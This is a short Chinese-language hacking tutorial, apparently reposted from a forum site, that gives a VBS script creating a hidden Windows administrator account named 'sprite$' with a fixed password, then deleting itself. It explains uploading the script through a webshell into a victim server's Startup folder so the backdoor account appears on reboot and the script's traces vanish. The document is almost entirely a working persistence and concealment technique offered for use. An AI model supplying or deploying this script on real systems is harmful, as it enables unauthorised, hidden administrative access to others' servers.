首先建一个vbs脚本文件 内容为
on error resume next
set shell=createobject("wscript.shell")
shell.run"cmd.exe /c net user sprite$ /del",false,false
shell.run"cmd.exe /c net user sprite$ 1983 /add",false,false
shell.run"cmd.exe /c net localgroup administrators sprite$ /add",false,false
set fso=CreateObject("Scripting.FileSystemObject")
if fso.FileExists("D:\Documents and Settings\Administrator\「开始」菜单\程序\启动\shell.vbs") then
fso.DeleteFile "D:\Documents and Settings\Administrator\「开始」菜单\程序\启动\shell.vbs",True
end if
意思是用wsh加用户后用fso删除我们的脚本
然后用webshell传到对方的管理员帐户的启动组里(当然前提是你有往这个目录的写权限)
我的系统装在D盘 所以为D:\Documents and Settings\Administrator\「开始」菜单\程序\启动
等服务器重新启动后,自动添加一个管理员,并且删除启动下的脚本,达到隐藏的目的
(出处:http://www.sheup.com)